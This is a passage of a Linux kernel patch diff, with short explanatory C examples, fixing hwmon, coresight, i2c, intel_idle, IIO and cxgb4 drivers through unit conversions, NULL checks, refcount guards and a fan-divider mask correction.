+-	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (tdata && tdata->cpu == cpu) {
+ 		target = cpumask_first(&pd->cpumask);
+ 		mutex_lock(&tdata->update_lock);
+@@ -789,7 +772,7 @@ static enum cpuhp_state coretemp_hp_online;
+ 
+ static int __init coretemp_init(void)
+ {
+-	int err;
++	int i, err;
+ 
+ 	/*
+ 	 * CPUID.06H.EAX[0] indicates whether the CPU has thermal
+@@ -805,20 +788,22 @@ static int __init coretemp_init(void)
+ 	if (!zone_devices)
+ 		return -ENOMEM;
+ 
+-	err = platform_driver_register(&coretemp_driver);
+-	if (err)
+-		goto outzone;
++	for (i = 0; i < max_zones; i++) {
++		err = coretemp_device_add(i);
++		if (err)
++			goto outzone;
++	}
+ 
+ 	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hwmon/coretemp:online",
+ 				coretemp_cpu_online, coretemp_cpu_offline);
+ 	if (err < 0)
+-		goto outdrv;
++		goto outzone;
+ 	coretemp_hp_online = err;
+ 	return 0;
+ 
+-outdrv:
+-	platform_driver_unregister(&coretemp_driver);
+ outzone:
++	while (i--)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ 	return err;
+ }
+@@ -826,8 +811,11 @@ module_init(coretemp_init)
+ 
+ static void __exit coretemp_exit(void)
+ {
++	int i;
++
+ 	cpuhp_remove_state(coretemp_hp_online);
+-	platform_driver_unregister(&coretemp_driver);
++	for (i = 0; i < max_zones; i++)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ }
+ module_exit(coretemp_exit)
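
The reworked coretemp_init() above creates one device per zone up front and, on failure, unwinds with `while (i--)`, which removes exactly the zones already added (in reverse order) and never touches the one that failed. The idiom in isolation, with hypothetical add/remove stubs:

#include <stdio.h>

static int device_add(int i)	 { return i == 3 ? -1 : 0; }	/* simulate zone 3 failing */
static void device_remove(int i) { printf("remove %d\n", i); }

int main(void)
{
	int i, err = 0, max_zones = 5;

	for (i = 0; i < max_zones; i++) {
		err = device_add(i);
		if (err)
			break;
	}
	if (err)
		while (i--)	/* unwinds 2, 1, 0 only */
			device_remove(i);
	return err ? 1 : 0;
}
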
+diff --git a/drivers/hwmon/ftsteutates.c b/drivers/hwmon/ftsteutates.c
+index f5b8e724a8ca1..ffa0bb3648775 100644
+--- a/drivers/hwmon/ftsteutates.c
++++ b/drivers/hwmon/ftsteutates.c
+@@ -12,6 +12,7 @@
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+ #include <linux/jiffies.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
+@@ -347,13 +348,15 @@ static ssize_t in_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->volt[index]);
++	value = DIV_ROUND_CLOSEST(data->volt[index] * 3300, 255);
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_value_show(struct device *dev,
+@@ -361,13 +364,15 @@ static ssize_t temp_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->temp_input[index]);
++	value = (data->temp_input[index] - 64) * 1000;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_fault_show(struct device *dev,
+@@ -436,13 +441,15 @@ static ssize_t fan_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->fan_input[index]);
++	value = data->fan_input[index] * 60;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t fan_source_show(struct device *dev,
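
The three show() changes above stop exporting raw register values and convert to the units hwmon userspace expects: the 8-bit ADC reading is scaled against a 3.3 V reference to millivolts, the temperature register carries a 64-unit offset and is reported in millidegrees Celsius, and the fan counter (apparently counts per second, given the factor) becomes RPM. Worked with hypothetical raw readings:

#include <stdio.h>

/* equivalent of the kernel's DIV_ROUND_CLOSEST for non-negative values */
static int div_round_closest(int n, int d)
{
	return (n + d / 2) / d;
}

int main(void)
{
	int raw_volt = 128, raw_temp = 89, raw_fan = 20;

	printf("in:   %d mV\n", div_round_closest(raw_volt * 3300, 255));	/* 1656 */
	printf("temp: %d mC\n", (raw_temp - 64) * 1000);			/* 25000 */
	printf("fan:  %d RPM\n", raw_fan * 60);					/* 1200 */
	return 0;
}
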
+diff --git a/drivers/hwmon/ltc2945.c b/drivers/hwmon/ltc2945.c
+index 9adebb59f6042..c06ab7317431f 100644
+--- a/drivers/hwmon/ltc2945.c
++++ b/drivers/hwmon/ltc2945.c
+@@ -248,6 +248,8 @@ static ssize_t ltc2945_value_store(struct device *dev,
+ 
+ 	/* convert to register value, then clamp and write result */
+ 	regval = ltc2945_val_to_reg(dev, reg, val);
++	if (regval < 0)
++		return regval;
+ 	if (is_power_reg(reg)) {
+ 		regval = clamp_val(regval, 0, 0xffffff);
+ 		regbuf[0] = regval >> 16;
+diff --git a/drivers/hwmon/mlxreg-fan.c b/drivers/hwmon/mlxreg-fan.c
+index b48bd7c961d66..96017cc8da7ec 100644
+--- a/drivers/hwmon/mlxreg-fan.c
++++ b/drivers/hwmon/mlxreg-fan.c
+@@ -155,6 +155,12 @@ mlxreg_fan_read(struct device *dev, enum hwmon_sensor_types type, u32 attr,
+ 			if (err)
+ 				return err;
+ 
++			if (MLXREG_FAN_GET_FAULT(regval, tacho->mask)) {
++				/* FAN is broken - return zero for FAN speed. */
++				*val = 0;
++				return 0;
++			}
++
+ 			*val = MLXREG_FAN_GET_RPM(regval, fan->divider,
+ 						  fan->samples);
+ 			break;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index da9ec6983e139..c54233f0369b2 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1150,7 +1150,7 @@ static int nct6775_write_fan_div(struct nct6775_data *data, int nr)
+ 	if (err)
+ 		return err;
+ 	reg &= 0x70 >> oddshift;
+-	reg |= data->fan_div[nr] & (0x7 << oddshift);
++	reg |= (data->fan_div[nr] & 0x7) << oddshift;
+ 	return nct6775_write_value(data, fandiv_reg, reg);
+ }
+ 
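
The one-liner above fixes a masking bug: the old expression masked the divider with an already-shifted constant, so for the odd-numbered fans (oddshift == 4) every divider bit was discarded. Worked with hypothetical values:

#include <stdio.h>

int main(void)
{
	unsigned int fan_div = 0x5, oddshift = 4, reg = 0;

	unsigned int buggy = reg | (fan_div & (0x7 << oddshift));	/* 0x5 & 0x70 == 0 */
	unsigned int fixed = reg | ((fan_div & 0x7) << oddshift);	/* 0x50 */

	printf("buggy=%#x fixed=%#x\n", buggy, fixed);
	return 0;
}
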
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index bf43f73dc835f..76c6b564d7fc4 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -17,7 +17,6 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+-#include <linux/wmi.h>
+ 
+ #include "nct6775.h"
+ 
+@@ -107,40 +106,51 @@ struct nct6775_sio_data {
+ 	void (*sio_exit)(struct nct6775_sio_data *sio_data);
+ };
+ 
+-#define ASUSWMI_MONITORING_GUID		"466747A0-70EC-11DE-8A39-0800200C9A66"
++#define ASUSWMI_METHOD			"WMBD"
+ #define ASUSWMI_METHODID_RSIO		0x5253494F
+ #define ASUSWMI_METHODID_WSIO		0x5753494F
+ #define ASUSWMI_METHODID_RHWM		0x5248574D
+ #define ASUSWMI_METHODID_WHWM		0x5748574D
+ #define ASUSWMI_UNSUPPORTED_METHOD	0xFFFFFFFE
++#define ASUSWMI_DEVICE_HID		"PNP0C14"
++#define ASUSWMI_DEVICE_UID		"ASUSWMI"
++#define ASUSMSI_DEVICE_UID		"AsusMbSwInterface"
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * ASUS boards have only one device with WMI "WMBD" method and have provided
++ * access to only one SuperIO chip at 0x0290.
++ */
++static struct acpi_device *asus_acpi_dev;
++#endif
+ 
+ static int nct6775_asuswmi_evaluate_method(u32 method_id, u8 bank, u8 reg, u8 val, u32 *retval)
+ {
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
++#if IS_ENABLED(CONFIG_ACPI)
++	acpi_handle handle = acpi_device_handle(asus_acpi_dev);
+ 	u32 args = bank | (reg << 8) | (val << 16);
+-	struct acpi_buffer input = { (acpi_size) sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct acpi_object_list input;
++	union acpi_object params[3];
++	unsigned long long result;
+ 	acpi_status status;
+-	union acpi_object *obj;
+-	u32 tmp = ASUSWMI_UNSUPPORTED_METHOD;
+-
+-	status = wmi_evaluate_method(ASUSWMI_MONITORING_GUID, 0,
+-				     method_id, &input, &output);
+ 
++	params[0].type = ACPI_TYPE_INTEGER;
++	params[0].integer.value = 0;
++	params[1].type = ACPI_TYPE_INTEGER;
++	params[1].integer.value = method_id;
++	params[2].type = ACPI_TYPE_BUFFER;
++	params[2].buffer.length = sizeof(args);
++	params[2].buffer.pointer = (void *)&args;
++	input.count = 3;
++	input.pointer = params;
++
++	status = acpi_evaluate_integer(handle, ASUSWMI_METHOD, &input, &result);
+ 	if (ACPI_FAILURE(status))
+ 		return -EIO;
+ 
+-	obj = output.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER)
+-		tmp = obj->integer.value;
+-
+ 	if (retval)
+-		*retval = tmp;
+-
+-	kfree(obj);
++		*retval = (u32)result & 0xFFFFFFFF;
+ 
+-	if (tmp == ASUSWMI_UNSUPPORTED_METHOD)
+-		return -ENODEV;
+ 	return 0;
+ #else
+ 	return -EOPNOTSUPP;
+@@ -1099,6 +1109,91 @@ static const char * const asus_wmi_boards[] = {
+ 	"TUF GAMING Z490-PLUS (WI-FI)",
+ };
+ 
++static const char * const asus_msi_boards[] = {
++	"EX-B660M-V5 PRO D4",
++	"PRIME B650-PLUS",
++	"PRIME B650M-A",
++	"PRIME B650M-A AX",
++	"PRIME B650M-A II",
++	"PRIME B650M-A WIFI",
++	"PRIME B650M-A WIFI II",
++	"PRIME B660M-A D4",
++	"PRIME B660M-A WIFI D4",
++	"PRIME X670-P",
++	"PRIME X670-P WIFI",
++	"PRIME X670E-PRO WIFI",
++	"Pro B660M-C-D4",
++	"ProArt B660-CREATOR D4",
++	"ProArt X670E-CREATOR WIFI",
++	"ROG CROSSHAIR X670E EXTREME",
++	"ROG CROSSHAIR X670E GENE",
++	"ROG CROSSHAIR X670E HERO",
++	"ROG MAXIMUS XIII EXTREME GLACIAL",
++	"ROG MAXIMUS Z690 EXTREME",
++	"ROG MAXIMUS Z690 EXTREME GLACIAL",
++	"ROG STRIX B650-A GAMING WIFI",
++	"ROG STRIX B650E-E GAMING WIFI",
++	"ROG STRIX B650E-F GAMING WIFI",
++	"ROG STRIX B650E-I GAMING WIFI",
++	"ROG STRIX B660-A GAMING WIFI D4",
++	"ROG STRIX B660-F GAMING WIFI",
++	"ROG STRIX B660-G GAMING WIFI",
++	"ROG STRIX B660-I GAMING WIFI",
++	"ROG STRIX X670E-A GAMING WIFI",
++	"ROG STRIX X670E-E GAMING WIFI",
++	"ROG STRIX X670E-F GAMING WIFI",
++	"ROG STRIX X670E-I GAMING WIFI",
++	"ROG STRIX Z590-A GAMING WIFI II",
++	"ROG STRIX Z690-A GAMING WIFI D4",
++	"TUF GAMING B650-PLUS",
++	"TUF GAMING B650-PLUS WIFI",
++	"TUF GAMING B650M-PLUS",
++	"TUF GAMING B650M-PLUS WIFI",
++	"TUF GAMING B660M-PLUS WIFI",
++	"TUF GAMING X670E-PLUS",
++	"TUF GAMING X670E-PLUS WIFI",
++	"TUF GAMING Z590-PLUS WIFI",
++};
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * Callback for acpi_bus_for_each_dev() to find the right device
++ * by _UID and _HID and return 1 to stop iteration.
++ */
++static int nct6775_asuswmi_device_match(struct device *dev, void *data)
++{
++	struct acpi_device *adev = to_acpi_device(dev);
++	const char *uid = acpi_device_uid(adev);
++	const char *hid = acpi_device_hid(adev);
++
++	if (hid && !strcmp(hid, ASUSWMI_DEVICE_HID) && uid && !strcmp(uid, data)) {
++		asus_acpi_dev = adev;
++		return 1;
++	}
++
++	return 0;
++}
++#endif
++
++static enum sensor_access nct6775_determine_access(const char *device_uid)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	u8 tmp;
++
++	acpi_bus_for_each_dev(nct6775_asuswmi_device_match, (void *)device_uid);
++	if (!asus_acpi_dev)
++		return access_direct;
++
++	/* if reading chip id via ACPI succeeds, use WMI "WMBD" method for access */
++	if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
++		pr_debug("Using Asus WMBD method of %s to access %#x chip.\n", device_uid, tmp);
++		return access_asuswmi;
++	}
++#endif
++
++	return access_direct;
++}
++
+ static int __init sensors_nct6775_platform_init(void)
+ {
+ 	int i, err;
+@@ -1109,7 +1204,6 @@ static int __init sensors_nct6775_platform_init(void)
+ 	int sioaddr[2] = { 0x2e, 0x4e };
+ 	enum sensor_access access = access_direct;
+ 	const char *board_vendor, *board_name;
+-	u8 tmp;
+ 
+ 	err = platform_driver_register(&nct6775_driver);
+ 	if (err)
+@@ -1122,15 +1216,13 @@ static int __init sensors_nct6775_platform_init(void)
+ 	    !strcmp(board_vendor, "ASUSTeK COMPUTER INC.")) {
+ 		err = match_string(asus_wmi_boards, ARRAY_SIZE(asus_wmi_boards),
+ 				   board_name);
+-		if (err >= 0) {
+-			/* if reading chip id via WMI succeeds, use WMI */
+-			if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
+-				pr_info("Using Asus WMI to access %#x chip.\n", tmp);
+-				access = access_asuswmi;
+-			} else {
+-				pr_err("Can't read ChipID by Asus WMI.\n");
+-			}
+-		}
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSWMI_DEVICE_UID);
++
++		err = match_string(asus_msi_boards, ARRAY_SIZE(asus_msi_boards),
++				   board_name);
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSMSI_DEVICE_UID);
+ 	}
+ 
+ 	/*
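
The rewritten nct6775_asuswmi_evaluate_method() above hands the ACPI WMBD method a single 32-bit buffer packing bank, register and value into consecutive bytes. The packing in isolation (the register value here is illustrative, not the real NCT6775_PORT_CHIPID):

#include <stdio.h>

int main(void)
{
	unsigned char bank = 0x00, reg = 0x58, val = 0x00;

	/* byte 0 = bank, byte 1 = register, byte 2 = value */
	unsigned int args = bank | (reg << 8) | (val << 16);

	printf("args=%#x\n", args);	/* 0x5800 */
	return 0;
}
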
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 57470fda5f6c9..30850a479f61f 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -402,7 +402,7 @@ static int create_temp_label(struct peci_cputemp *priv)
+ 	unsigned long core_max = find_last_bit(priv->core_mask, CORE_NUMS_MAX);
+ 	int i;
+ 
+-	priv->coretemp_label = devm_kzalloc(priv->dev, core_max * sizeof(char *), GFP_KERNEL);
++	priv->coretemp_label = devm_kzalloc(priv->dev, (core_max + 1) * sizeof(char *), GFP_KERNEL);
+ 	if (!priv->coretemp_label)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index d2cf4f4848e1b..838872f2484d3 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -151,9 +151,16 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ {
+ 	struct cti_config *config = &drvdata->config;
+ 	struct coresight_device *csdev = drvdata->csdev;
++	int ret = 0;
+ 
+ 	spin_lock(&drvdata->spinlock);
+ 
++	/* don't allow negative refcounts, return an error */
++	if (!atomic_read(&drvdata->config.enable_req_count)) {
++		ret = -EINVAL;
++		goto cti_not_disabled;
++	}
++
+ 	/* check refcount - disable on 0 */
+ 	if (atomic_dec_return(&drvdata->config.enable_req_count) > 0)
+ 		goto cti_not_disabled;
+@@ -171,12 +178,12 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ 	coresight_disclaim_device_unlocked(csdev);
+ 	CS_LOCK(drvdata->base);
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ 
+ 	/* not disabled this call */
+ cti_not_disabled:
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ }
+ 
+ void cti_write_single_reg(struct cti_drvdata *drvdata, int offset, u32 value)
+diff --git a/drivers/hwtracing/coresight/coresight-cti-sysfs.c b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+index 6d59c815ecf5e..71e7a8266bb32 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-sysfs.c
++++ b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+@@ -108,10 +108,19 @@ static ssize_t enable_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (val)
++	if (val) {
++		ret = pm_runtime_resume_and_get(dev->parent);
++		if (ret)
++			return ret;
+ 		ret = cti_enable(drvdata->csdev);
+-	else
++		if (ret)
++			pm_runtime_put(dev->parent);
++	} else {
+ 		ret = cti_disable(drvdata->csdev);
++		if (!ret)
++			pm_runtime_put(dev->parent);
++	}
++
+ 	if (ret)
+ 		return ret;
+ 	return size;
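
The enable_store() hunk above keeps the runtime-PM reference balanced against the CTI state: take a reference before enabling and drop it if the enable fails; on disable, drop the reference only when the disable succeeds (the matching core change makes a redundant disable return -EINVAL instead of underflowing the refcount). A runnable sketch of the pairing with stubbed get/put:

#include <stdio.h>

static int refs;
static int pm_get(void)	 { refs++; return 0; }
static void pm_put(void) { refs--; }

static int store_enable(int val, int enable_ret, int disable_ret)
{
	int ret;

	if (val) {
		ret = pm_get();
		if (ret)
			return ret;
		ret = enable_ret;
		if (ret)
			pm_put();	/* undo the reference on a failed enable */
	} else {
		ret = disable_ret;
		if (!ret)
			pm_put();	/* drop only after a successful disable */
	}
	return ret;
}

int main(void)
{
	store_enable(1, -1, 0);			/* failed enable */
	printf("refs=%d\n", refs);		/* 0: reference was undone */
	store_enable(1, 0, 0);			/* enable... */
	store_enable(0, 0, 0);			/* ...then disable */
	printf("refs=%d\n", refs);		/* 0: balanced */
	return 0;
}
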
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 1cc052979e016..77bca6932f017 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -427,8 +427,10 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, config->vipcssctlr, TRCVIPCSSCTLR);
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, config->seq_ctrl[i], TRCSEQEVRn(i));
+-	etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, config->ext_inp, TRCEXTINSELR);
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+ 		etm4x_relaxed_write32(csa, config->cntrldvr[i], TRCCNTRLDVRn(i));
+@@ -1634,8 +1636,10 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+ 
+-	state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
+-	state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
++		state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	}
+ 	state->trcextinselr = etm4x_read32(csa, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+@@ -1763,8 +1767,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+ 
+-	etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, state->trcextinselr, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 5d5526aa60c40..30f1525639b57 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -356,8 +356,18 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 
+ static int hisi_ptt_init_filters(struct pci_dev *pdev, void *data)
+ {
++	struct pci_dev *root_port = pcie_find_root_port(pdev);
+ 	struct hisi_ptt_filter_desc *filter;
+ 	struct hisi_ptt *hisi_ptt = data;
++	u32 port_devid;
++
++	if (!root_port)
++		return 0;
++
++	port_devid = PCI_DEVID(root_port->bus->number, root_port->devfn);
++	if (port_devid < hisi_ptt->lower_bdf ||
++	    port_devid > hisi_ptt->upper_bdf)
++		return 0;
+ 
+ 	/*
+ 	 * We won't fail the probe if filter allocation failed here. The filters
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index 581e02cc979a0..2f2e99882b011 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -465,7 +465,7 @@ void __i2c_dw_disable(struct dw_i2c_dev *dev)
+ 	dev_warn(dev->dev, "timeout in disabling adapter\n");
+ }
+ 
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev)
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev)
+ {
+ 	/*
+ 	 * Clock is not necessary if we got LCNT/HCNT values directly from
+diff --git a/drivers/i2c/busses/i2c-designware-core.h b/drivers/i2c/busses/i2c-designware-core.h
+index 95ebc5eaa5d12..6bc2edec14f2f 100644
+--- a/drivers/i2c/busses/i2c-designware-core.h
++++ b/drivers/i2c/busses/i2c-designware-core.h
+@@ -320,7 +320,7 @@ int i2c_dw_init_regmap(struct dw_i2c_dev *dev);
+ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset);
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset);
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev);
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev);
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev);
+ int i2c_dw_prepare_clk(struct dw_i2c_dev *dev, bool prepare);
+ int i2c_dw_acquire_lock(struct dw_i2c_dev *dev);
+ void i2c_dw_release_lock(struct dw_i2c_dev *dev);
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index fd70794bfceec..a378f679b499d 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -1025,7 +1025,7 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
+ 									NULL)
+ };
+ 
+-const struct geni_i2c_desc i2c_master_hub = {
++static const struct geni_i2c_desc i2c_master_hub = {
+ 	.has_core_clk = true,
+ 	.icc_ddr = NULL,
+ 	.no_dma_support = true,
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..f060ac7376e69 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,13 +168,7 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-
+-	/*
+-	 * The lockdep hardirqs state may be changed to 'on' with timer
+-	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
+-	 * to keep the hardirqs state correct.
+-	 */
+-	local_irq_disable();
++	raw_local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iio/light/tsl2563.c b/drivers/iio/light/tsl2563.c
+index d0e42b73203a6..71302ae864d99 100644
+--- a/drivers/iio/light/tsl2563.c
++++ b/drivers/iio/light/tsl2563.c
+@@ -704,6 +704,7 @@ static int tsl2563_probe(struct i2c_client *client)
+ 	struct iio_dev *indio_dev;
+ 	struct tsl2563_chip *chip;
+ 	struct tsl2563_platform_data *pdata = client->dev.platform_data;
++	unsigned long irq_flags;
+ 	int err = 0;
+ 	u8 id = 0;
+ 
+@@ -759,10 +760,15 @@ static int tsl2563_probe(struct i2c_client *client)
+ 		indio_dev->info = &tsl2563_info_no_irq;
+ 
+ 	if (client->irq) {
++		irq_flags = irq_get_trigger_type(client->irq);
++		if (irq_flags == IRQF_TRIGGER_NONE)
++			irq_flags = IRQF_TRIGGER_RISING;
++		irq_flags |= IRQF_ONESHOT;
++
+ 		err = devm_request_threaded_irq(&client->dev, client->irq,
+ 					   NULL,
+ 					   &tsl2563_event_handler,
+-					   IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					   irq_flags,
+ 					   "tsl2563_event",
+ 					   indio_dev);
+ 		if (err) {
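
The probe change above honors an interrupt trigger type already configured (for instance via firmware) and falls back to the old rising-edge default only when none is set, always OR-ing in IRQF_ONESHOT as the threaded handler requires. The selection logic in isolation (the flag values are stand-ins, not the real IRQF_* constants):

#include <stdio.h>

#define TRIGGER_NONE	0x0	/* stand-ins for IRQF_TRIGGER_NONE/RISING, IRQF_ONESHOT */
#define TRIGGER_RISING	0x1
#define ONESHOT		0x2000

static unsigned int pick_irq_flags(unsigned int configured)
{
	unsigned int flags = configured;

	if (flags == TRIGGER_NONE)
		flags = TRIGGER_RISING;	/* the old hard-coded default */
	return flags | ONESHOT;
}

int main(void)
{
	printf("%#x\n", pick_irq_flags(TRIGGER_NONE));	/* 0x2001 */
	printf("%#x\n", pick_irq_flags(0x2));		/* 0x2002: keeps configured type */
	return 0;
}
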
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index 499a425a33791..ced615b5ea096 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -2676,6 +2676,9 @@ static int pass_establish(struct c4iw_dev *dev, struct sk_buff *skb)
+ 	u16 tcp_opt = ntohs(req->tcp_opt);
+ 
+ 	ep = get_ep_from_tid(dev, tid);
++	if (!ep)
++		return 0;
++
+ 	pr_debug("ep %p tid %u\n", ep, ep->hwtid);
+ 	ep->snd_seq = be32_to_cpu(req->snd_isn);
+ 	ep->rcv_seq = be32_to_cpu(req->rcv_isn);
+@@ -4144,6 +4147,10 @@ static int rx_pkt(struct c4iw_dev *dev, struct sk_buff *skb)
+ 
+ 	if (neigh->dev->flags & IFF_LOOPBACK) {
+ 		pdev = ip_dev_find(&init_net, iph->daddr);
++		if (!pdev) {
++			pr_err("%s - failed to find device!\n", __func__);
++			goto free_dst;
++		}
+ 		e = cxgb4_l2t_get(dev->rdev.lldi.l2t, neigh,
+ 				    pdev, 0);
+ 		pi = (struct port_info *)netdev_priv(pdev);
+diff --git a/drivers/infiniband/hw/cxgb4/restrack.c b/drivers/infiniband/hw/cxgb4/restrack.c
+index ff645b955a082..fd22c85d35f4f 100644
+--- a/drivers/infiniband/hw/cxgb4/restrack.c
++++ b/drivers/infiniband/hw/cxgb4/restrack.c
+@@ -238,7 +238,7 @@ int c4iw_fill_res_cm_id_entry(struct sk_buff *msg,
+ 	if (rdma_nl_put_driver_u64_hex(msg, "history", epcp->history))
+ 		goto err_cancel_table;
+ 
+-	if (epcp->state == LISTEN) {
++	if (listen_ep) {
+ 		if (rdma_nl_put_driver_u32(msg, "stid", listen_ep->stid))
+ 			goto err_cancel_table;
+ 		if (rdma_nl_put_driver_u32(msg, "backlog", listen_ep->backlog))
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 5dab1e87975ba..9c30d78730aa1 100644
